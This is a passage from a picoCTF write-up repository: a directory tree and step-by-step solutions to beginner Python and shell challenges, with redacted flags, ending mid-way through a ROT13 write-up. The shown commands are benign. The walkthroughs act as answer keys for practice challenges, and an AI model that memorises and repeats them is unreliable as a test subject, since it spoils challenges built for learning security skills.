├── Beginner_picoMini_2022 ├── General_Skills │ ├── Codebook.md │ ├── Glitch_Cat.md │ ├── HashingJobApp.md │ ├── PW_Crack_1.md │ ├── PW_Crack_2.md │ ├── PW_Crack_3.md │ ├── PW_Crack_4.md │ ├── PW_Crack_5.md │ ├── README.md │ ├── Serpentine.md │ ├── convertme.py.md │ ├── fixme1.py.md │ ├── fixme2.py.md │ └── runme.py.md └── README.md ├── README.md ├── picoCTF_2019 ├── Binary_Exploitation │ ├── README.md │ └── seed-sPRiNG.md ├── Cryptography │ ├── 13.md │ ├── Easy1.md │ ├── Flags.md │ ├── Mr-Worldwide.md │ ├── README.md │ ├── Tapping.md │ ├── The_Numbers.md │ ├── caesar.md │ ├── la_cifra_de.md │ ├── miniRSA.md │ ├── rsa-pop-quiz.md │ └── waves_over_lambda.md ├── Forensics │ ├── Glory_of_the_Garden.md │ ├── Investigative_Reversing_0.md │ ├── Investigative_Reversing_1.md │ ├── README.md │ ├── So_Meta.md │ ├── What_Lies_Within.md │ ├── WhitePages.md │ ├── extensions.md │ ├── like1000.md │ ├── m00nwalk.md │ ├── m00nwalk2.md │ ├── shark_on_wire_1.md │ └── shark_on_wire_2.md ├── General_Skills │ ├── 1_wanna_b3_a_r0ck5tar.md │ ├── 2Warm.md │ ├── Based.md │ ├── Bases.md │ ├── First_Grep.md │ ├── Lets_Warm_Up.md │ ├── README.md │ ├── Warmed_Up.md │ ├── flag_shop.md │ ├── mus1c.md │ ├── plumbing.md │ ├── strings_it.md │ └── whats_a_net_cat.md ├── README.md ├── Reverse_Engineering │ ├── Droids0_Emulation.png │ ├── README.md │ ├── asm1.md │ ├── asm2.md │ ├── asm3.md │ ├── droids0.md │ ├── droids1.md │ ├── reverse_cipher.md │ ├── vault-door-1.md │ ├── vault-door-3.md │ ├── vault-door-4.md │ ├── vault-door-5.md │ ├── vault-door-6.md │ └── vault-door-training.md └── Web_Exploitation │ ├── Client-side-again.md │ ├── Insp3ct0r.md │ ├── Irish-Name-Repo_1.md │ ├── Irish-Name-Repo_2.md │ ├── Network_conditions_tab_in_DevTools.png │ ├── README.md │ ├── dont-use-client-side.md │ ├── logon.md │ ├── picobrowser.md │ └── where_are_the_robots.md ├── picoCTF_2020 ├── Forensics │ └── Pitter_Patter_Platters.md ├── README.md └── Web_Exploitation │ └── Web_Gauntlet.md ├── picoCTF_2021 ├── Binary_Exploitation │ ├── Heres_a_LIBC.md │ ├── README.md │ └── Stonks.md ├── Cryptography │ ├── Dachshund_Attacks.md │ ├── Easy_Peasy.md │ ├── Mind_your_Ps_and_Qs.md │ ├── Mini_RSA.md │ ├── Mod_26.md │ ├── New_Caesar.md │ ├── No_Padding_No_Problem.md │ ├── Pixelated.md │ ├── Play_Nice.md │ └── README.md ├── Forensics │ ├── Booting_disk_in_Qemu.png │ ├── Disk_disk_sleuth.md │ ├── Disk_disk_sleuth_II.md │ ├── MacroHard_WeakEdge.md │ ├── Matryoshka_doll.md │ ├── Milkslap.md │ ├── README.md │ ├── Surfing_the_Waves.md │ ├── Trivial_Flag_Transfer_Protocol.md │ ├── Wireshark_doo_dooo_do_doo.md │ ├── Wireshark_twoo_twooo_two_twoo.md │ ├── information.md │ └── tunn3l_v1s10n.md ├── General_Skills │ ├── Magikarp_Ground_Mission.md │ ├── Nice_netcat.md │ ├── Obedient_Cat.md │ ├── Python_Wrangling.md │ ├── README.md │ ├── Static_aint_always_noise.md │ ├── Tab_Tab_Attack.md │ └── Wave_a_flag.md ├── README.md ├── Reverse_Engineering │ ├── ARMssembly_0.md │ ├── ARMssembly_1.md │ ├── ARMssembly_2.md │ ├── ARMssembly_3.md │ ├── ARMssembly_4.md │ ├── README.md │ ├── Shop.md │ ├── The_flag_in_NC_Viewer.png │ ├── Transformation.md │ ├── crackme-py.md │ ├── keygenme-py.md │ └── speeds_and_feeds.md └── Web_Exploitation │ ├── Cookies.md │ ├── GET_aHEAD.md │ ├── It_is_my_Birthday.md │ ├── More_Cookies.md │ ├── Most_Cookies.md │ ├── README.md │ ├── Scavenger_Hunt.md │ ├── Some_Assembly_Required_1.md │ ├── Some_Assembly_Required_2.md │ └── Who_are_you.md ├── picoCTF_2022 ├── Binary_Exploitation │ ├── CVE-XXXX-XXXX.md │ ├── README.md │ ├── RPS.md │ ├── basic-file-exploit.md │ ├── buffer_overflow_0.md │ ├── buffer_overflow_1.md │ └── buffer_overflow_2.md ├── Cryptography │ ├── README.md │ ├── Vigenere.md │ ├── basic-mod1.md │ ├── basic-mod2.md │ ├── credstuff.md │ ├── morse-code.md │ ├── rail-fence.md │ ├── substitution0.md │ ├── substitution1.md │ ├── substitution2.md │ └── transposition-trial.md ├── Forensics │ ├── Disk_mounted_in_FTK_Imager.png │ ├── Enhance.md │ ├── File_types.md │ ├── Lookey_here.md │ ├── Packets_Primer.md │ ├── README.md │ ├── Redaction_gone_wrong.md │ ├── Sleuthkit_Apprentice.md │ └── Sleuthkit_Intro.md ├── README.md ├── Reverse_Engineering │ ├── Fresh_Java.md │ ├── GDB_Layout_Asm.png │ ├── GDB_Test_Drive.md │ ├── README.md │ ├── Safe_Opener.md │ ├── bloat.py.md │ ├── file-run1.md │ ├── file-run2.md │ ├── jadx-gui_decompilation.png │ ├── patchme.py.md │ └── unpackme.py.md └── Web_Exploitation │ ├── Forbidden_Paths.md │ ├── Includes.md │ ├── Inspect_HTML.md │ ├── Local_Authority.md │ ├── Power_Cookie.md │ ├── README.md │ ├── Roboto_Sans.md │ ├── Search_source.md │ └── Secrets.md ├── picoCTF_2023 ├── Binary_Exploitation │ ├── README.md │ ├── Twos_complement.png │ ├── VNE.md │ ├── babygame01.md │ ├── hijacking.md │ ├── tic-tac.md │ └── two-sum.md ├── Cryptography │ ├── HideToSee.md │ ├── README.md │ ├── ReadMyCert.md │ └── rotation.md ├── Forensics │ ├── FindAndOpen.md │ ├── Invisible_WORDs.md │ ├── MSB.md │ ├── PcapPoisoning.md │ ├── README.md │ ├── StegSolve_MSB_data_extraction.png │ └── hideme.md ├── General_Skills │ ├── Permissions.md │ ├── README.md │ ├── Special.md │ ├── Specialer.md │ ├── chrono.md │ ├── repetitions.md │ └── useless.md ├── README.md ├── Reverse_Engineering │ ├── README.md │ ├── Ready_Gladiator_0.md │ ├── Ready_Gladiator_1.md │ ├── Ready_Gladiator_2.md │ ├── Reverse.md │ ├── Safe_Opener_2.md │ ├── The_Black_Box_in_Blender.png │ ├── Virtual_Machine_0.md │ └── timer.md └── Web_Exploitation │ ├── MatchTheRegex.md │ ├── More_SQLi.md │ ├── More_SQLi_in_Burp_Suite.png │ ├── README.md │ ├── Redirections_in_the_findme_challenge.png │ ├── SOAP.md │ └── findme.md ├── picoCTF_2024 ├── Binary_Exploitation │ ├── README.md │ ├── format_string_0.md │ ├── format_string_1.md │ ├── format_string_2.md │ ├── heap_0.md │ ├── heap_1.md │ └── heap_2.md ├── Cryptography │ ├── C3.md │ ├── Custom_encryption.md │ ├── README.md │ └── interencdec.md ├── Forensics │ ├── Blast_from_the_past.md │ ├── CanYouSee.md │ ├── Mob_psycho.md │ ├── README.md │ ├── Scan_Surprise.md │ ├── Secret_of_the_Polyglot.md │ └── Verify.md ├── General_Skills │ ├── Binary_Search.md │ ├── Blame_Game.md │ ├── Collaborative_Development.md │ ├── Commitment_Issues.md │ ├── README.md │ ├── SansAlpha.md │ ├── Super_SSH.md │ ├── Time_Machine.md │ ├── binhexa.md │ ├── dont-you-love-banners.md │ └── endianness.md ├── README.md ├── Reverse_Engineering │ ├── FactCheck.md │ ├── README.md │ └── packer.md └── Web_Exploitation │ ├── Bookmarklet.md │ ├── Images │ └── Bookmarklet_Web_Site.png │ ├── IntroToBurp.md │ ├── README.md │ ├── Trickster.md │ ├── Unminify.md │ └── WebDecode.md ├── picoCTF_2025 ├── Binary_Exploitation │ ├── PIE_TIME.md │ └── README.md ├── Cryptography │ ├── EVEN_RSA_CAN_BE_BROKEN.md │ ├── README.md │ └── hashcrack.md ├── Forensics │ ├── Images │ │ └── Info_encoded_in_RED.png │ ├── Ph4nt0m_1ntrud3r.md │ ├── README.md │ └── RED.md ├── General_Skills │ ├── FANTASY_CTF.md │ ├── README.md │ ├── Rust_fixme_1.md │ ├── Rust_fixme_2.md │ └── Rust_fixme_3.md ├── README.md ├── Reverse_Engineering │ ├── Flag_Hunters.md │ └── README.md └── Web_Exploitation │ ├── Cookie_Monster_Secret_Recipe.md │ ├── Images │ ├── Cookie_Monster.png │ ├── Heapdump_endpoint_info.png │ ├── NoSanity_1.png │ ├── Pachinko_NAND_Simulator.png │ ├── SSTI_Decision_Tree.png │ └── head-dump.png │ ├── Pachinko.md │ ├── README.md │ ├── SSTI1.md │ ├── head-dump.md │ └── n0s4n1ty_1.md ├── picoGym_Exclusive ├── Binary_Exploitation │ ├── Local_Target.md │ └── README.md ├── Forensics │ ├── Name_of_SSID_Field_in_Wireshark.png │ ├── README.md │ └── WPA-ing_Out.md ├── General_Skills │ ├── ASCII_Numbers.md │ ├── Big_Zip.md │ ├── First_Find.md │ └── README.md ├── README.md ├── Reverse_Engineering │ ├── ASCII_FTW.md │ ├── Bit-O-Asm-1.md │ ├── Bit-O-Asm-2.md │ ├── Bit-O-Asm-3.md │ ├── Bit-O-Asm-4.md │ ├── GDB_baby_step_1.md │ ├── GDB_baby_step_2.md │ ├── GDB_baby_step_3.md │ ├── GDB_baby_step_4.md │ ├── Picker_I.md │ ├── Picker_II.md │ ├── Picker_III.md │ ├── Picker_IV.md │ └── README.md └── Web_Exploitation │ ├── JAuth.md │ ├── README.md │ └── The_Token_Cookie_in_DevTools.png ├── picoMini_by_redpwn ├── Binary_Exploitation │ ├── README.md │ └── clutter-overflow.md ├── Cryptography │ ├── README.md │ ├── XtraORdinary.md │ ├── spelling-quiz.md │ └── triple-secure.md ├── Forensics │ ├── README.md │ └── advanced-potion-making.md ├── README.md ├── Reverse_Engineering │ ├── README.md │ └── not_crypto.md └── Web_Exploitation │ ├── README.md │ ├── caas.md │ └── login.md └── picoctf_logo.png /Beginner_picoMini_2022/General_Skills/Codebook.md: -------------------------------------------------------------------------------- 1 | # Codebook 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: Beginner picoMini 2022, General Skills, shell, Python 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Run the Python script code.py in the same directory as codebook.txt. 15 | 16 | Download code.py 17 | Download codebook.txt 18 | 19 | Hints: 20 | 1. On the webshell, use ls to see if both files are in the directory you are in 21 | 2. The str_xor function does not need to be reverse engineered for this challenge. 22 | ``` 23 | Challenge link: [https://play.picoctf.org/practice/challenge/238](https://play.picoctf.org/practice/challenge/238) 24 | 25 | ## Solution 26 | 27 | Most of the time you just make sure the script is executable and then run it 28 | ```bash 29 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook] 30 | └─$ chmod +x code.py 31 | 32 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook] 33 | └─$ ./code.py 34 | ./code.py: 2: import: not found 35 | ./code.py: 3: import: not found 36 | ./code.py: 7: Syntax error: "(" unexpected 37 | ``` 38 | 39 | But in this case that doesn't work. The reason for this is that the script doesn't contain a so called 'shebang' - a special comment specifying what kind of program/interpreter that should execute the script. It normally looks something like this `#!/usr/bin/python3`. 40 | 41 | Let's display the first lines of the script with `head` to verify this. 42 | ```bash 43 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook] 44 | └─$ head code.py 45 | 46 | import random 47 | import sys 48 | 49 | def str_xor(secret, key): 50 | #extend key to secret length 51 | new_key = key 52 | i = 0 53 | ``` 54 | 55 | Yes. the shebang is missing and we need to explicitly say that Python should run the script like this 56 | ```bash 57 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Codebook] 58 | └─$ python code.py 59 | picoCTF{} 60 | ``` 61 | 62 | For additional information, please see the references below. 63 | 64 | ### References 65 | 66 | - [Real Python - Executing Python Scripts With a Shebang](https://realpython.com/python-shebang/) 67 | - [chmod — Linux manual page](https://man7.org/linux/man-pages/man1/chmod.1.html) 68 | - [head — Linux manual page](https://man7.org/linux/man-pages/man1/head.1.html) 69 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/General_Skills/Glitch_Cat.md: -------------------------------------------------------------------------------- 1 | # Glitch Cat 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: Beginner picoMini 2022, General Skills, nc, shell, Python 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Our flag printing service has started glitching! 15 | 16 | $ nc saturn.picoctf.net 50363 17 | 18 | Hints: 19 | 1. ASCII is one of the most common encodings used in programming 20 | 2. We know that the glitch output is valid Python, somehow! 21 | 3. Press Ctrl and c on your keyboard to close your connection and return to the command prompt. 22 | ``` 23 | Challenge link: [https://play.picoctf.org/practice/challenge/242](https://play.picoctf.org/practice/challenge/242) 24 | 25 | ## Solution 26 | 27 | Connect to the flag printing service 28 | ```bash 29 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Glitch_Cat] 30 | └─$ nc saturn.picoctf.net 50363 31 | 'picoCTF{gl17ch_m3_n07_' + chr(0x61) + chr(0x34) + chr(0x33) + chr(0x39) + chr(0x32) + chr(0x64) + chr(0x32) + chr(0x65) + '}' 32 | ``` 33 | 34 | The first part of the flag looks correct, but the last part looks rather like python code. 35 | 36 | Let's try to execute it 37 | ```bash 38 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Glitch_Cat] 39 | └─$ python -c "print('picoCTF{gl17ch_m3_n07_' + chr(0x61) + chr(0x34) + chr(0x33) + chr(0x39) + chr(0x32) + chr(0x64) + chr(0x32) + chr(0x65) + '}')" 40 | picoCTF{} 41 | ``` 42 | And we get the complete flag (but redacted here). 43 | 44 | The plus operator can also "add" strings together. This is called concatenation. 45 | The `chr` function returns the ASCII-character of the value. 46 | Numbers preceded with '0x' are in hexadecimal. 47 | 48 | For additional information, please see the references below. 49 | 50 | ### References 51 | 52 | - [W3Schools - Python Operators](https://www.w3schools.com/python/python_operators.asp) 53 | - [nc - Linux man page](https://linux.die.net/man/1/nc) 54 | - [Wikipedia - ASCII](https://en.wikipedia.org/wiki/ASCII) 55 | - [Wikipedia - Hexadecimal](https://en.wikipedia.org/wiki/Hexadecimal) 56 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/General_Skills/PW_Crack_1.md: -------------------------------------------------------------------------------- 1 | # PW Crack 1 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: Beginner picoMini 2022, General Skills, password_cracking 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Can you crack the password to get the flag? 15 | 16 | Download the password checker here and you'll need the encrypted flag in the same directory too. 17 | 18 | Hints: 19 | 1. To view the file in the webshell, do: $ nano level1.py 20 | 2. To exit nano, press Ctrl and x and follow the on-screen prompts. 21 | 3. The str_xor function does not need to be reverse engineered for this challenge. 22 | ``` 23 | Challenge link: [https://play.picoctf.org/practice/challenge/245](https://play.picoctf.org/practice/challenge/245) 24 | 25 | ## Solution 26 | 27 | Let's start with analysing the Python script. The script looks like this (with some empty lines removed) 28 | ```python 29 | ### THIS FUNCTION WILL NOT HELP YOU FIND THE FLAG --LT ######################## 30 | def str_xor(secret, key): 31 | #extend key to secret length 32 | new_key = key 33 | i = 0 34 | while len(new_key) < len(secret): 35 | new_key = new_key + key[i] 36 | i = (i + 1) % len(key) 37 | return "".join([chr(ord(secret_c) ^ ord(new_key_c)) for (secret_c,new_key_c) in zip(secret,new_key)]) 38 | ############################################################################### 39 | 40 | flag_enc = open('level1.flag.txt.enc', 'rb').read() 41 | 42 | def level_1_pw_check(): 43 | user_pw = input("Please enter correct password for flag: ") 44 | if( user_pw == "691d"): 45 | print("Welcome back... your flag, user:") 46 | decryption = str_xor(flag_enc.decode(), user_pw) 47 | print(decryption) 48 | return 49 | print("That password is incorrect") 50 | 51 | level_1_pw_check() 52 | ``` 53 | 54 | The most interesting part is ofcourse the IF statement where we see the password in plain text 55 | ```python 56 | <---snip---> 57 | user_pw = input("Please enter correct password for flag: ") 58 | if( user_pw == "691d"): 59 | print("Welcome back... your flag, user:") 60 | decryption = str_xor(flag_enc.decode(), user_pw) 61 | print(decryption) 62 | return 63 | <---snip---> 64 | ``` 65 | 66 | With knowledge of the password (`691d`) we can run the script to get the flag 67 | ```bash 68 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/PW_Crack_1] 69 | └─$ python level1.py 70 | Please enter correct password for flag: 691d 71 | Welcome back... your flag, user: 72 | picoCTF{} 73 | ``` 74 | 75 | For additional information, please see the references below. 76 | 77 | ### References 78 | 79 | - [Wikipedia - Exclusive or](https://en.wikipedia.org/wiki/Exclusive_or) 80 | - [W3Schools - Python - List Comprehension](https://www.w3schools.com/python/python_lists_comprehension.asp) 81 | - [GeeksforGeeks - zip() in Python](https://www.geeksforgeeks.org/zip-in-python/) 82 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/General_Skills/README.md: -------------------------------------------------------------------------------- 1 | # General Skills Challenges 2 | 3 | 13 Challenges: 4 | - [Codebook](Codebook.md) 5 | - [convertme.py](convertme.py.md) 6 | - [fixme1.py](fixme1.py.md) 7 | - [fixme2.py](fixme2.py.md) 8 | - [Glitch Cat](Glitch_Cat.md) 9 | - [HashingJobApp](HashingJobApp.md) 10 | - [PW Crack 1](PW_Crack_1.md) 11 | - [PW Crack 2](PW_Crack_2.md) 12 | - [PW Crack 3](PW_Crack_3.md) 13 | - [PW Crack 4](PW_Crack_4.md) 14 | - [PW Crack 5](PW_Crack_5.md) 15 | - [runme.py](runme.py.md) 16 | - [Serpentine](Serpentine.md) 17 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/General_Skills/fixme1.py.md: -------------------------------------------------------------------------------- 1 | # fixme1.py 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: Beginner picoMini 2022, General Skills, Python 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Fix the syntax error in this Python script to print the flag. 15 | 16 | Download Python script 17 | 18 | Hints: 19 | 1. Indentation is very meaningful in Python 20 | 2. To view the file in the webshell, do: $ nano fixme1.py 21 | 3. To exit nano, press Ctrl and x and follow the on-screen prompts. 22 | 4. The str_xor function does not need to be reverse engineered for this challenge. 23 | ``` 24 | Challenge link: [https://play.picoctf.org/practice/challenge/240](https://play.picoctf.org/practice/challenge/240) 25 | 26 | ## Solution 27 | 28 | Try running the script and see what happens 29 | ```bash 30 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme1.py] 31 | └─$ python fixme1.py 32 | File "/mnt/hgfs/CTFs/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme1.py/fixme1.py", line 20 33 | print('That is correct! Here\'s your flag: ' + flag) 34 | IndentationError: unexpected indent 35 | ``` 36 | 37 | Python uses [indentation](https://www.w3schools.com/python/gloss_python_indentation.asp) to indicate what lines of code are included in blocks of code. 38 | The indentation consists of spaces or tabs. You can choose either but you cannot mix in the same script. 39 | 40 | Lets look at lines of code around line 20 41 | ```python 42 | <---snip---> 43 | flag_enc = chr(0x15) + chr(0x07) + chr(0x08) + chr(0x06) + chr(0x27) + chr(0x21) + chr(0x23) + chr(0x15) + chr(0x5a) + chr(0x07) + chr(0x00) + chr(0x46) + chr(0x0b) + chr(0x1a) + chr(0x5a) + chr(0x1d) + chr(0x1d) + chr(0x2a) + chr(0x06) + chr(0x1c) + chr(0x5a) + chr(0x5c) + chr(0x55) + chr(0x40) + chr(0x3a) + chr(0x5e) + chr(0x52) + chr(0x0c) + chr(0x01) + chr(0x42) + chr(0x57) + chr(0x59) + chr(0x0a) + chr(0x14) 44 | 45 | flag = str_xor(flag_enc, 'enkidu') 46 | print('That is correct! Here\'s your flag: ' + flag) 47 | ``` 48 | 49 | The `print` statement is indented but shouldn't be. Remove the spaces before `print` and save the script. 50 | 51 | Then try to run the script again 52 | ```bash 53 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme1.py] 54 | └─$ python fixme1.py 55 | That is correct! Here's your flag: picoCTF{} 56 | ``` 57 | 58 | For additional information, please see the references below. 59 | 60 | ### References 61 | 62 | - [W3Schools - Python Indentation](https://www.w3schools.com/python/gloss_python_indentation.asp) 63 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/General_Skills/fixme2.py.md: -------------------------------------------------------------------------------- 1 | # fixme2.py 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: Beginner picoMini 2022, General Skills, Python 11 | Author: LT 'SYREAL' JONES 12 | 13 | Description: 14 | Fix the syntax error in the Python script to print the flag. 15 | 16 | Download Python script 17 | 18 | Hints: 19 | 1. Are equality and assignment the same symbol? 20 | 2. To view the file in the webshell, do: $ nano fixme2.py 21 | 3. To exit nano, press Ctrl and x and follow the on-screen prompts. 22 | 4. The str_xor function does not need to be reverse engineered for this challenge. 23 | ``` 24 | Challenge link: [https://play.picoctf.org/practice/challenge/241](https://play.picoctf.org/practice/challenge/241) 25 | 26 | ## Solution 27 | 28 | Try running the script and see what happens 29 | ```bash 30 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme2.py] 31 | └─$ python fixme2.py 32 | File "/mnt/hgfs/CTFs/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme2.py/fixme2.py", line 22 33 | if flag = "": 34 | ^^^^^^^^^ 35 | SyntaxError: invalid syntax. Maybe you meant '==' or ':=' instead of '='? 36 | ``` 37 | 38 | Python is kind enough to suggest possible solutions. Change the '=' to a '==' and save the script. 39 | '=' is the assigment operator and '==' is the equal comparison operator. 40 | 41 | Then try to run the script again 42 | ```bash 43 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Fixme2.py] 44 | └─$ python fixme2.py 45 | That is correct! Here's your flag: picoCTF{} 46 | ``` 47 | 48 | For additional information, please see the references below. 49 | 50 | ### References 51 | 52 | - [W3Schools - Python Operators](https://www.w3schools.com/python/python_operators.asp) 53 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/General_Skills/runme.py.md: -------------------------------------------------------------------------------- 1 | # runme.py 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | 6 | ## Challenge information 7 | ``` 8 | Points: 100 9 | Tags: Beginner picoMini 2022, General Skills, Python 10 | Author: SUJEET KUMAR 11 | 12 | Description: 13 | Run the runme.py script to get the flag. 14 | Download the script with your browser or with wget in the webshell. 15 | Download runme.py Python script 16 | 17 | Hints: 18 | 1. If you have Python on your computer, you can download the script normally and run it. 19 | Otherwise, use the wget command in the webshell. 20 | 2. To use wget in the webshell, first right click on the download link and select 'Copy Link' or 'Copy Link Address' 21 | 3. Type everything after the dollar sign in the webshell: 22 | $ wget , then paste the link after the space after wget and press enter. 23 | This will download the script for you in the webshell so you can run it! 24 | 4. Finally, to run the script, type everything after the dollar sign and then press enter: 25 | $ python3 runme.py You should have the flag now! 26 | ``` 27 | Challenge link: [https://play.picoctf.org/practice/challenge/250](https://play.picoctf.org/practice/challenge/250) 28 | 29 | ## Solution 30 | 31 | This challenge is very straight forward, but let's start with looking at the script 32 | ```python 33 | #!/usr/bin/python3 34 | ################################################################################ 35 | # Python script which just prints the flag 36 | ################################################################################ 37 | 38 | flag ='picoCTF{}' 39 | print(flag) 40 | ``` 41 | 42 | And there is our flag (but it's redacted above). 43 | 44 | If we still want to run the script we can certainly do that. Either explicitly with Python 45 | ```bash 46 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Runme.py] 47 | └─$ python runme.py 48 | picoCTF{} 49 | ``` 50 | 51 | Or by making sure it is executable and then run it stand-alone 52 | ```bash 53 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Runme.py] 54 | └─$ chmod +x runme.py 55 | 56 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/Beginner_picoMini_2022/General_Skills/Runme.py] 57 | └─$ ./runme.py 58 | picoCTF{} 59 | ``` 60 | -------------------------------------------------------------------------------- /Beginner_picoMini_2022/README.md: -------------------------------------------------------------------------------- 1 | # Beginner picoMini 2022 Challenges 2 | 3 | ## General Skills Challenges 4 | 5 | 13 Challenges: 6 | - [Codebook](General_Skills/Codebook.md) 7 | - [convertme.py](General_Skills/convertme.py.md) 8 | - [fixme1.py](General_Skills/fixme1.py.md) 9 | - [fixme2.py](General_Skills/fixme2.py.md) 10 | - [Glitch Cat](General_Skills/Glitch_Cat.md) 11 | - [HashingJobApp](General_Skills/HashingJobApp.md) 12 | - [PW Crack 1](General_Skills/PW_Crack_1.md) 13 | - [PW Crack 2](General_Skills/PW_Crack_2.md) 14 | - [PW Crack 3](General_Skills/PW_Crack_3.md) 15 | - [PW Crack 4](General_Skills/PW_Crack_4.md) 16 | - [PW Crack 5](General_Skills/PW_Crack_5.md) 17 | - [runme.py](General_Skills/runme.py.md) 18 | - [Serpentine](General_Skills/Serpentine.md) 19 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![picoCTF Logo](picoctf_logo.png) 3 | 4 | # Writeups for picoCTF challenges 5 | 6 | Welcome to [my](https://play.picoctf.org/users/Cajac) writeups for [picoCTF](https://play.picoctf.org/login) challenges. 7 | These writeups are mainly a documentation for myself but I hope others will benefit from them as well. 8 | 9 | In total you will find more than 250 challenge solutions here. 10 | 11 | ## Challenges 12 | 13 | - [picoCTF 2025 Challenges](picoCTF_2025/README.md) 14 | - [picoCTF 2024 Challenges](picoCTF_2024/README.md) 15 | - [picoCTF 2023 Challenges](picoCTF_2023/README.md) 16 | - [picoCTF 2022 Challenges](picoCTF_2022/README.md) 17 | - [Beginner picoMini 2022 Challenges](Beginner_picoMini_2022/README.md) 18 | - [picoMini by redpwn Challenges](picoMini_by_redpwn/README.md) 19 | - [picoCTF 2021 Challenges](picoCTF_2021/README.md) 20 | - [picoCTF 2020 Mini-Competition Challenges](picoCTF_2020/README.md) 21 | - [picoCTF 2019 Challenges](picoCTF_2019/README.md) 22 | - [picoGym Exclusive Challenges](picoGym_Exclusive/README.md) 23 | 24 | ## No spoilers 25 | 26 | The solutions contains step-by-step walkthroughs but doesn't display the flags in plain text. 27 | Instead the flags are displayd as `picoCTF{}` or with just some portion of the flag visible. 28 | 29 | ## Support my work 30 | 31 | If you appreciate this repository and learn from it, please consider [giving it a star](https://docs.github.com/en/get-started/exploring-projects-on-github/saving-repositories-with-stars#starring-a-repository) to support it and spread the word. 32 | 33 | ## Language disclaimer 34 | 35 | I'm not a native English speaker so please forgive any spelling mistakes or grammatical errors. 36 | 37 | ## Acknowledgements 38 | 39 | Some of the solutions were inspired by writeups and walkthroughs from these guys: 40 | 41 | - [Almond Force](https://www.youtube.com/@AlmondForce) 42 | - [David](https://github.com/Dvd848/CTFs) 43 | - [Gynvael](https://www.youtube.com/@GynvaelEN) 44 | - [Hayden Housen](https://github.com/HHousen) 45 | - [John Hammond](https://www.youtube.com/@_JohnHammond) 46 | - [Martin Carlisle](https://www.youtube.com/@carlislemc) 47 | -------------------------------------------------------------------------------- /picoCTF_2019/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | 1 Challenge: 4 | - [seed-sPRiNG](seed-sPRiNG.md) 5 | -------------------------------------------------------------------------------- /picoCTF_2019/Cryptography/13.md: -------------------------------------------------------------------------------- 1 | # 13 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, Cryptography 11 | Author: ALEX FULTON/DANIEL TUNITIS 12 | 13 | Description: 14 | Cryptography can be easy, do you know what ROT13 is? 15 | cvpbPGS{abg_gbb_onq_bs_n_ceboyrz} 16 | 17 | Hints: 18 | 1. This can be solved online if you don't want to do it by hand! 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/62](https://play.picoctf.org/practice/challenge/62) 21 | 22 | ## Solution 23 | 24 | There are several ways to solve this challenge and here are some of them. 25 | 26 | ### CyberChef solution 27 | 28 | We can use [CyberChef](https://gchq.github.io/CyberChef/) and the `ROT13` recipe to solve this. 29 | Type 'rot13' in the `Operations` search bar, then drag and drop it to the `Recipe` pane. 30 | Then copy and paste `cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}` to the `Input` pane. 31 | Finally press `BAKE` if you don't have `Auto Bake` selected already. 32 | The flag is shown in the `Output` pane. 33 | 34 | ### Use a rot13 commandline tool in Linux 35 | 36 | There are at least two sets of packages that contains prepacked `rot13` tools: 37 | * [hxtools](https://manpages.debian.org/testing/hxtools/hxtools.7.en.html) 38 | * [bsdgames](https://wiki.linuxquestions.org/wiki/BSD_games) 39 | 40 | Install them with either `sudo apt install hxtools` or `sudo apt install bsdgames`. 41 | 42 | The tool from 